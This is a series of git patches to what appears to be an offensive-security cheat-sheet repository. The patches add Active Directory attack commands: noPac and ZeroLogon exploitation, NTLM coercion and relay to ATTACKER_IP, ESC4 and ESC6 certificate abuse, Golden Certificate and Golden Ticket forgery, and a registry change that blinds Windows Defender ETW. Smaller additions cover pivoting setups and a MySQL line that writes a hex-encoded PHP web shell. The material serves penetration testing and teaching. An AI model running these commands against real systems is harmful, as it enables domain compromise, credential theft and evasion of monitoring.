--- .../Active Directory Attack.md | 70 ++++++++++++++++--- .../Windows - Persistence.md | 3 + .../Windows - Privilege Escalation.md | 4 +- 3 files changed, 66 insertions(+), 11 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index c9644aa..15269f8 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -600,6 +600,11 @@ Exploit steps from the white paper lsadump::postzerologon /target:10.10.10.10 /account:DC01$ ``` +* `CrackMapExec` - only check + ```powershell + crackmapexec smb 10.10.10.10 -u username -p password -d domain -M zerologon + ``` + #### PrintNightmare > CVE-2021-1675 / CVE-2021-34527 @@ -679,21 +684,38 @@ Requirements: > During S4U2Self, the KDC will try to append a '\$' to the computer name specified in the TGT, if the computer name is not found. An attacker can create a new machine account with the sAMAccountName set to a domain controller's sAMAccountName - without the '\$'. For instance, suppose there is a domain controller with a sAMAccountName set to 'DC\$'. An attacker would then create a machine account with the sAMAccountName set to 'DC'. The attacker can then request a TGT for the newly created machine account. After the TGT has been issued by the KDC, the attacker can rename the newly created machine account to something different, e.g. JOHNS-PC. The attacker can then perform S4U2Self and request a TGS to itself as any user. Since the machine account with the sAMAccountName set to 'DC' has been renamed, the KDC will try to find the machine account by appending a '$', which will then match the domain controller. The KDC will then issue a valid TGS for the domain controller. **Requirements** + * MachineAccountQuota > 0 +**Check for exploitation** + +0. Check the MachineAccountQuota of the account + ```powershell + crackmapexec ldap 10.10.10.10 -u username -p 'Password123' -d 'domain.local' --kdcHost 10.10.10.10 -M MAQ + StandIn.exe --object ms-DS-MachineAccountQuota=* + ``` +1. Check if the DC is vulnerable + ```powershell + crackmapexec smb 10.10.10.10 -u '' -p '' -d domain -M nopac + ``` + **Exploitation** 0. Create a computer account ```powershell impacket@linux> addcomputer.py -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-host DC01 -domain-netbios domain 'domain.local/user1:complexpassword' + powermad@windows> . .\Powermad.ps1 powermad@windows> $password = ConvertTo-SecureString 'ComputerPassword' -AsPlainText -Force powermad@windows> New-MachineAccount -MachineAccount "ControlledComputer" -Password $($password) -Domain "domain.local" -DomainController "DomainController.domain.local" -Verbose + + sharpmad@windows> Sharpmad.exe MAQ -Action new -MachineAccount ControlledComputer -MachinePassword ComputerPassword ``` 1. Clear the controlled machine account `servicePrincipalName` attribute ```ps1 impacket@linux> addspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController + powershell@windows> . .\Powerview.ps1 powershell@windows> Set-DomainObject "CN=ControlledComputer,CN=Computers,DC=domain,DC=local" -Clear 'serviceprincipalname' -Verbose ``` 2. (CVE-2021-42278) Change the controlled machine account `sAMAccountName` to a Domain Controller's name without the trailing `$` @@ -755,9 +777,22 @@ Automated exploitation: C:\Windows\system32>whoami nt authority\system ``` +* [Pachine - @ly4k](https://github.com/ly4k/Pachine) + ```powershell + usage: pachine.py [-h] [-scan] [-spn SPN] [-impersonate IMPERSONATE] [-domain-netbios NETBIOSNAME] [-computer-name NEW-COMPUTER-NAME$] [-computer-pass password] [-debug] [-method {SAMR,LDAPS}] [-port {139,445,636}] [-baseDN DC=test,DC=local] + [-computer-group CN=Computers,DC=test,DC=local] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] -dc-host hostname [-dc-ip ip] + [domain/]username[:password] + $ python3 pachine.py -dc-host dc.predator.local -scan 'predator.local/john:Passw0rd!' + $ python3 pachine.py -dc-host dc.predator.local -spn cifs/dc.predator.local -impersonate administrator 'predator.local/john:Passw0rd!' + $ export KRB5CCNAME=$PWD/administrator@predator.local.ccache + $ impacket-psexec -k -no-pass 'predator.local/administrator@dc.predator.local' + ``` **Mitigations**: -* KB5008602 +* [KB5007247 - Windows Server 2012 R2](https://support.microsoft.com/en-us/topic/november-9-2021-kb5007247-monthly-rollup-2c3b6017-82f4-4102-b1e2-36f366bf3520) +* [KB5008601 - Windows Server 2016](https://support.microsoft.com/en-us/topic/november-14-2021-kb5008601-os-build-14393-4771-out-of-band-c8cd33ce-3d40-4853-bee4-a7cc943582b9) +* [KB5008602 - Windows Server 2019](https://support.microsoft.com/en-us/topic/november-14-2021-kb5008602-os-build-17763-2305-out-of-band-8583a8a3-ebed-4829-b285-356fb5aaacd7) +* [KB5007205 - Windows Server 2022](https://support.microsoft.com/en-us/topic/november-9-2021-kb5007205-os-build-20348-350-af102e6f-cc7c-4cd4-8dc2-8b08d73d2b31) * [KB5008102](https://support.microsoft.com/en-us/topic/kb5008102-active-directory-security-accounts-manager-hardening-changes-cve-2021-42278-5975b463-4c95-45e1-831a-d120004e258e) * [KB5008380](https://support.microsoft.com/en-us/topic/kb5008380-authentication-updates-cve-2021-42287-9dafac11-e0d0-4cb8-959a-143bd0201041) @@ -1245,9 +1280,10 @@ Most of the time the best passwords to spray are : - `P@ssw0rd01`, `Password123`, `Password1`, `Hello123`, `mimikatz` - `Welcome1`/`Welcome01` -- $Companyname1 :` $Microsoft1` +- $Companyname1 :`$Microsoft1` - SeasonYear : `Winter2019*`, `Spring2020!`, `Summer2018?`, `Summer2020`, `July2020!` - Default AD password with simple mutations such as number-1, special character iteration (*,?,!,#) +- Empty Password (Hash:31d6cfe0d16ae931b73c59d7e0c089c0) #### Kerberos pre-auth bruteforcing @@ -1853,7 +1889,7 @@ root@kali:~$ klist * LmCompatibilityLevel = 0x1: Send LM & NTLM (`reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v lmcompatibilitylevel`) **Exploitation**: -* Capturing using Responder: Edit the /etc/responder/Responder.conf file to include the magical **1122334455667788** challenge +* Capturing using Responder: Edit the `/etc/responder/Responder.conf` file to include the magical **1122334455667788** challenge ```ps1 HTTPS = On DNS = On @@ -1863,7 +1899,7 @@ root@kali:~$ klist ; Use "Random" for generating a random challenge for each requests (Default) Challenge = 1122334455667788 ``` -* Fire Responder: `responder -I eth0 --lm` +* Fire Responder: `responder -I eth0 --lm`, if `--disable-ess` is set, extended session security will be disabled for NTLMv1 authentication * Force a callback: ```ps1 PetitPotam.exe Responder-IP DC-IP # Patched around August 2021 @@ -2108,7 +2144,7 @@ secretsdump.py -k -no-pass target.lab.local #### Relaying with WebDav Trick -> Example of exploitation where you can coerce machine accounts to authenticate to a host annd combine it with Resource Based Constrained Delegation to gain elevated access. +> Example of exploitation where you can coerce machine accounts to authenticate to a host and combine it with Resource Based Constrained Delegation to gain elevated access. It allows attackers to elicit authentications made over HTTP instead of SMB **Requirement**: * WebClient service @@ -2117,8 +2153,23 @@ secretsdump.py -k -no-pass target.lab.local * Disable HTTP in Responder: `sudo vi /usr/share/responder/Responder.conf` * Generate a Windows machine name: `sudo responder -I eth0`, e.g: WIN-UBNW4FI3AP0 * Prepare for RBCD against the DC: `python3 ntlmrelayx.py -t ldaps://dc --delegate-access -smb2support` -* Discover WebDAV using [GetWebDAVStatus](https://github.com/G0ldenGunSec/GetWebDAVStatus): `GetWebDAVStatus.exe 10.0.0.4` -* Trigger the authentication to relay to our nltmrelayx: `PetitPotam.exe WIN-UBNW4FI3AP0@80/pentestlab 10.0.0.4` +* Discover WebDAV services + ```ps1 + webclientservicescanner 'domain.local'/'user':'password'@'machine' + crackmapexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav + GetWebDAVStatus.exe 'machine' + ``` +* Trigger the authentication to relay to our nltmrelayx: `PetitPotam.exe WIN-UBNW4FI3AP0@80/test.txt 10.0.0.4`, the listener host must be specified with the FQDN or full netbios name like `logger.domain.local@80/test.txt`. Specifying the IP results in anonymous auth instead of System. + ```ps1 + # PrinterBug + dementor.py -d "DOMAIN" -u "USER" -p "PASSWORD" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "ATTACKER_IP" + SpoolSample.exe "ATTACKER_IP" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" + + # PetitPotam + Petitpotam.py "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "ATTACKER_IP" + Petitpotam.py -d "DOMAIN" -u "USER" -p "PASSWORD" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "ATTACKER_IP" + PetitPotam.exe "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "ATTACKER_IP" + ``` * Use the created account to ask for a service ticket: ```ps1 .\Rubeus.exe hash /domain:purple.lab /user:WVLFLLKZ$ /password:'iUAL)l lsadump::dcsync /user:krbtgt ``` -* Version 3: ADCSPwn +* Version 3: ADCSPwn - Require `WebClient` service running on the domain controller. By default this service is not installed. ```powershell https://github.com/bats3c/ADCSPwn adcspwn.exe --adcs --port [local port] --remote [computer] @@ -3347,4 +3398,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [Access controls - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/access-controls) * [Web endpoints - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/web-endpoints) * [sAMAccountName spoofing - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing) -* [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html) \ No newline at end of file +* [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html) +* [WebDAV, NTLM & Responder - Didier Stevens - Monday 20 May 2019](https://blog.didierstevens.com/2019/05/20/webdav-ntlm-responder/) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index 39847c0..916f67e 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -60,6 +60,9 @@ MpCmdRun.exe -RemoveDefinitions -All Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe" Add-MpPreference -ExclusionProcess 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\Video, C:\install + +# Blind ETW Windows Defender: zero out registry values corresponding to its ETW sessions +reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f ``` ## Disable Windows Firewall diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index c67f48e..8743b0f 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -1396,10 +1396,10 @@ Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc ### MS17-010 (Eternal Blue) -Check the vulnerability with the following nmap script. +Check the vulnerability with the following nmap script or crackmapexec: `crackmapexec smb 10.10.10.10 -u '' -p '' -d domain -M ms17-010`. ```c -nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17–010 +nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17–010 ``` Metasploit modules to exploit `EternalRomance/EternalSynergy/EternalChampion`. From 8411a0640dc0f30b1503b65965dd5135cd9af1b4 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Wed, 29 Dec 2021 15:00:22 +0100 Subject: [PATCH 12/50] ESC4 - Access Control Vulnerabilities --- .../Active Directory Attack.md | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index ac26153..474dff3 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -75,6 +75,7 @@ - [Active Directory Certificate Services](#active-directory-certificate-services) - [ESC1 - Misconfigured Certificate Templates](#esc1---misconfigured-certificate-templates) - [ESC2 - Misconfigured Certificate Templates](#esc2---misconfigured-certificate-templates) + - [ESC4 - Access Control Vulnerabilities](#esc4---access-control-vulnerabilities) - [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack) - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces) @@ -2232,6 +2233,22 @@ Exploitation: * Request a certificate specifying the `/altname` as a domain admin like in [ESC1](#esc1---misconfigured-certificate-templates). +#### ESC4 - Access Control Vulnerabilities + +* Search for `WriteProperty` with value `00000000-0000-0000-0000-000000000000` using [modifyCertTemplate](https://github.com/fortalice/modifyCertTemplate) + ```ps1 + python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -get-acl + ``` +* Add the `ENROLLEE_SUPPLIES_SUBJECT` (ESS) flag to perform ESC1 + ```ps1 + python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -add enrollee_supplies_subject -property mspki-Certificate-Name-Flag + ``` +* Perform ESC1 and then restore the value + ```ps1 + python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -value 0 -property mspki-Certificate-Name-Flag + ``` + + #### ESC8 - AD CS Relay Attack > An attacker can trigger a Domain Controller using PetitPotam to NTLM relay credentials to a host of choice. The Domain Controller’s NTLM Credentials can then be relayed to the Active Directory Certificate Services (AD CS) Web Enrollment pages, and a DC certificate can be enrolled. This certificate can then be used to request a TGT (Ticket Granting Ticket) and compromise the entire domain through Pass-The-Ticket. @@ -3399,3 +3416,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [Web endpoints - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/web-endpoints) * [sAMAccountName spoofing - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing) * [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html) +* [ADCS: Playing with ESC4 - Matthew Creel](https://www.fortalicesolutions.com/posts/adcs-playing-with-esc4) From c9ef8f7f4935e789ec2afcfb35e318a2b7b9d206 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Wed, 29 Dec 2021 18:16:26 +0100 Subject: [PATCH 13/50] Graftcp Cheatsheet --- File Inclusion/README.md | 1 + .../Network Pivoting Techniques.md | 40 +++++++++++++++---- 2 files changed, 34 insertions(+), 7 deletions(-) diff --git a/File Inclusion/README.md b/File Inclusion/README.md index cc4a67f..0e6c0b5 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -433,3 +433,4 @@ If SSH is active check which user is being used `/proc/self/status` and `/etc/pa * [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf) * [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a) * [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1) +* [PHP LFI with Nginx Assistance](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/) \ No newline at end of file diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index 670fae3..68a6197 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -82,17 +82,43 @@ socks4 localhost 8080 Set the SOCKS4 proxy then `proxychains nmap -sT 192.168.5.6` -## Graphtcp +## Graftcp -Same as proxychains, with another mechanism to "proxify" which allow Go applications. +> A flexible tool for redirecting a given program's TCP traffic to SOCKS5 or HTTP proxy. -```powershell -git clone https://github.com/hmgle/graftcp.git -cd graftcp && make -graftcp-local/graftcp-local -./graftcp chromium-browser +:warning: Same as proxychains, with another mechanism to "proxify" which allow Go applications. + +```ps1 +# https://github.com/hmgle/graftcp + +# Create a SOCKS5, using Chisel or another tool and forward it through SSH +(attacker) $ ssh -fNT -i /tmp/id_rsa -L 1080:127.0.0.1:1080 root@IP_VPS +(vps) $ ./chisel server --tls-key ./key.pem --tls-cert ./cert.pem -p 8443 -reverse +(victim 1) $ ./chisel client --tls-skip-verify https://IP_VPS:8443 R:socks + +# Run graftcp and specify the SOCKS5 +(attacker) $ graftcp-local -listen :2233 -logfile /tmp/toto -loglevel 6 -socks5 127.0.0.1:1080 +(attacker) $ graftcp ./nuclei -u http://172.16.1.24 ``` +Simple configuration file for graftcp + +```py +# https://github.com/hmgle/graftcp/blob/master/local/example-graftcp-local.conf +## Listen address (default ":2233") +listen = :2233 +loglevel = 1 + +## SOCKS5 address (default "127.0.0.1:1080") +socks5 = 127.0.0.1:1080 +# socks5_username = SOCKS5USERNAME +# socks5_password = SOCKS5PASSWORD + +## Set the mode for select a proxy (default "auto") +select_proxy_mode = auto +``` + + ## Web SOCKS - reGeorg [reGeorg](https://github.com/sensepost/reGeorg), the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn. From 5b131ec479e153b78b0a19cafaf4963b41cb0bf1 Mon Sep 17 00:00:00 2001 From: Houziaux Mike Date: Sat, 1 Jan 2022 11:43:58 +0100 Subject: [PATCH 14/50] Update extensions.lst --- Upload Insecure Files/Extension PHP/extensions.lst | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/Upload Insecure Files/Extension PHP/extensions.lst b/Upload Insecure Files/Extension PHP/extensions.lst index b348161..acb75fe 100644 --- a/Upload Insecure Files/Extension PHP/extensions.lst +++ b/Upload Insecure Files/Extension PHP/extensions.lst @@ -6,6 +6,7 @@ .php4 .php5 .php7 +.php8 .pht .phar .phpt @@ -17,4 +18,4 @@ .php%00.png .php\x00.png .php%00.jpg -.php\x00.jpg \ No newline at end of file +.php\x00.jpg From d037335a4aec05c35edcbee3583b579f4d190dbf Mon Sep 17 00:00:00 2001 From: enaylal Date: Sat, 1 Jan 2022 11:48:07 +0100 Subject: [PATCH 15/50] add file php8 --- Upload Insecure Files/Extension PHP/phpinfo.php8 | 1 + 1 file changed, 1 insertion(+) create mode 100644 Upload Insecure Files/Extension PHP/phpinfo.php8 diff --git a/Upload Insecure Files/Extension PHP/phpinfo.php8 b/Upload Insecure Files/Extension PHP/phpinfo.php8 new file mode 100644 index 0000000..147cebc --- /dev/null +++ b/Upload Insecure Files/Extension PHP/phpinfo.php8 @@ -0,0 +1 @@ + From b5df6e1447596cb675a6c8c5351d546c1d531a83 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 1 Jan 2022 20:42:58 +0100 Subject: [PATCH 16/50] ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 + Golden Certificate --- .../Active Directory Attack.md | 37 ++++++++++--- .../Windows - Persistence.md | 52 +++++++++++++++++++ 2 files changed, 83 insertions(+), 6 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 474dff3..b0600c7 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -76,6 +76,7 @@ - [ESC1 - Misconfigured Certificate Templates](#esc1---misconfigured-certificate-templates) - [ESC2 - Misconfigured Certificate Templates](#esc2---misconfigured-certificate-templates) - [ESC4 - Access Control Vulnerabilities](#esc4---access-control-vulnerabilities) + * [ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 ](#esc6---editf_attributesubjectaltname2) - [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack) - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces) @@ -2182,7 +2183,8 @@ secretsdump.py -k -no-pass target.lab.local ### Active Directory Certificate Services -Find ADCS Server : `crackmapexec ldap domain.lab -u username -p password -M adcs` +* Find ADCS Server : `crackmapexec ldap domain.lab -u username -p password -M adcs` +* Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping` #### ESC1 - Misconfigured Certificate Templates @@ -2197,6 +2199,7 @@ Exploitation: * Use [Certify.exe](https://github.com/GhostPack/Certify) to see if there are any vulnerable templates ```ps1 Certify.exe find /vulnerable + Certify.exe find /vulnerable /currentuser or PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local' ``` @@ -2223,7 +2226,7 @@ Exploitation: #### ESC2 - Misconfigured Certificate Templates Requirements: -* Allows requesters to specify a SAN in the CSR as well as allows Any Purpose EKU (2.5.29.37.0) +* Allows requesters to specify a Subject Alternative Name (SAN) in the CSR as well as allows Any Purpose EKU (2.5.29.37.0) Exploitation: * Find template @@ -2235,6 +2238,8 @@ Exploitation: #### ESC4 - Access Control Vulnerabilities +> Enabling the `mspki-certificate-name-flag` flag for a template that allows for domain authentication, allow attackers to "push a misconfiguration to a template leading to ESC1 vulnerability + * Search for `WriteProperty` with value `00000000-0000-0000-0000-000000000000` using [modifyCertTemplate](https://github.com/fortalice/modifyCertTemplate) ```ps1 python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -get-acl @@ -2242,12 +2247,32 @@ Exploitation: * Add the `ENROLLEE_SUPPLIES_SUBJECT` (ESS) flag to perform ESC1 ```ps1 python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -add enrollee_supplies_subject -property mspki-Certificate-Name-Flag + + # Add/remove ENROLLEE_SUPPLIES_SUBJECT flag from the WebServer template. + C:\>StandIn.exe --adcs --filter WebServer --ess --add ``` * Perform ESC1 and then restore the value ```ps1 python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -value 0 -property mspki-Certificate-Name-Flag ``` +#### ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 + +> If this flag is set on the CA, any request (including when the subject is built from Active Directory) can have user defined values in the subject alternative name. + +Exploitation: +* Use [Certify.exe](https://github.com/GhostPack/Certify) to check for **UserSpecifiedSAN** flag state which refers to the `EDITF_ATTRIBUTESUBJECTALTNAME2` flag. + ```ps1 + Certify.exe cas + ``` +* Request a certificate for a template and add an altname, even though the default `User` template doesn't normally allow to specify alternative names + ```ps1 + .\Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:User /altname:DomAdmin + ``` + +Mitigation: +* Remove the flag : `certutil.exe -config "CA01.domain.local\CA01" -setreg "policy\EditFlags" -EDITF_ATTRIBUTESUBJECTALTNAME2` + #### ESC8 - AD CS Relay Attack @@ -2363,13 +2388,13 @@ ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtr #### GenericAll * **GenericAll on User** : We can reset user's password without knowing the current password -* **GenericAll on Group** : Effectively, this allows us to add ourselves (the user spotless) to the Domain Admin group : - * On Windows : `net group "domain admins" spotless /add /domain` +* **GenericAll on Group** : Effectively, this allows us to add ourselves (the user hacker) to the Domain Admin group : + * On Windows : `net group "domain admins" hacker /add /domain` * On Linux: * using the Samba software suite : - `net rpc group ADDMEM "GROUP NAME" UserToAdd -U 'AttackerUser%MyPassword' -W DOMAIN -I [DC IP]` + `net rpc group ADDMEM "GROUP NAME" UserToAdd -U 'hacker%MyPassword123' -W DOMAIN -I [DC IP]` * using bloodyAD: - `bloodyAD.py --host [DC IP] -d DOMAIN -u AttackerUser -p MyPassword addObjectToGroup UserToAdd 'GROUP NAME'` + `bloodyAD.py --host [DC IP] -d DOMAIN -u hacker -p MyPassword123 addObjectToGroup UserToAdd 'GROUP NAME'` * **GenericAll/GenericWrite** : We can set a **SPN** on a target account, request a TGS, then grab its hash and kerberoast it. ```powershell diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index 916f67e..3c5252c 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -29,6 +29,9 @@ * [sethc.exe](#sethc.exe) * [Remote Desktop Services Shadowing](#remote-desktop-services-shadowing) * [Skeleton Key](#skeleton-key) +* [Domain](#domain) + * [Golden Certificate](#golden-certificate) + * [Golden Ticket](#golden-ticket) * [References](#references) @@ -381,6 +384,54 @@ Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName -Credential \Administrator ``` +## Domain + +### User Certificate + +```ps1 +# Request a certificate for the User template +.\Certify.exe request /ca:CA01.megacorp.local\CA01 /template:User + +# Convert the certificate for Rubeus +openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx + +# Request a TGT using the certificate +.\Rubeus.exe asktgt /user:username /certificate:C:\Temp\cert.pfx /password:Passw0rd123! +``` + +### Golden Certificate + +> Require elevated privileges in the Active Directory, or on the ADCS machine + +* Export CA as p12 file: `certsrv.msc` > `Right Click` > `Back up CA...` +* Alternative 1: Using Mimikatz you can extract the certificate as PFX/DER + ```ps1 + privilege::debug + crypto::capi + crypto::cng + crypto::certificates /systemstore:local_machine /store:my /export + ``` +* Alternative 2: Using SharpDPAPI, then convert the certificate: `openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx` +* [ForgeCert](https://github.com/GhostPack/ForgeCert) - Forge a certificate for any active domain user using the CA certificate + ```ps1 + ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword Password123 --Subject CN=User --SubjectAltName harry@lab.local --NewCertPath harry.pfx --NewCertPassword Password123 + ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword Password123 --Subject CN=User --SubjectAltName DC$@lab.local --NewCertPath dc.pfx --NewCertPassword Password123 + ``` +* Finally you can request a TGT using the Certificate + ```ps1 + Rubeus.exe asktgt /user:ron /certificate:harry.pfx /password:Password123 + ``` + +### Golden Ticket + +> Forge a Golden ticket using Mimikatz + +```ps1 +kerberos::purge +kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt +kerberos::tgt +``` + ## References * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/) @@ -393,3 +444,4 @@ Enter-PSSession -ComputerName -Credential \Administr * [Persistence - BITS Jobs - @netbiosX](https://pentestlab.blog/2019/10/30/persistence-bits-jobs/) * [Persistence – Image File Execution Options Injection - @netbiosX](https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/) * [Persistence – Registry Run Keys - @netbiosX](https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/) +* [Golden Certificate - NOVEMBER 15, 2021](https://pentestlab.blog/2021/11/15/golden-certificate/) From 119ae90db630a5649f343eddc847417a3f5bb59f Mon Sep 17 00:00:00 2001 From: astroicers Date: Tue, 4 Jan 2022 14:28:17 +0800 Subject: [PATCH 17/50] Update MySQL Injection.md fix line 426 --- SQL Injection/MySQL Injection.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index 7edb7e2..393ab40 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -423,7 +423,7 @@ GRANT FILE ON *.* TO 'root'@'localhost'; FLUSH PRIVILEGES;# ### Into dumpfile method ```sql -[...] UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPILE 'C:/Program Files/EasyPHP-12.1/www/shell.php' +[...] UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPFILE 'C:/Program Files/EasyPHP-12.1/www/shell.php' [...] UNION SELECT 0x3c3f7068702073797374656d28245f4745545b2763275d293b203f3e INTO DUMPFILE '/var/www/html/images/shell.php'; ``` From dfe830d1832d656a55cbf5a152c242b53597a551 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 4 Jan 2022 21:11:26 +0100 Subject: [PATCH 18/50] RODC - Read Only Domain Controller Compromise --- .../Active Directory Attack.md | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index b0600c7..e5dee5b 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -102,6 +102,7 @@ - [Kerberos Resource Based Constrained Delegation](#kerberos-resource-based-constrained-delegation) - [Kerberos Bronze Bit Attack - CVE-2020-17049](#kerberos-bronze-bit-attack---cve-2020-17049) - [PrivExchange attack](#privexchange-attack) + - [RODC - Read Only Domain Controller Compromise](#rodc---read-only-domain-controller-compromise) - [PXE Boot image attack](#pxe-boot-image-attack) - [DSRM Credentials](#dsrm-credentials) - [DNS Reconnaissance](#dns-reconnaissance) @@ -3119,6 +3120,27 @@ python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th DCip --just-dc-user krbtgt MailServerip ``` +### RODC - Read Only Domain Controller Compromise + +> If the user is included in the 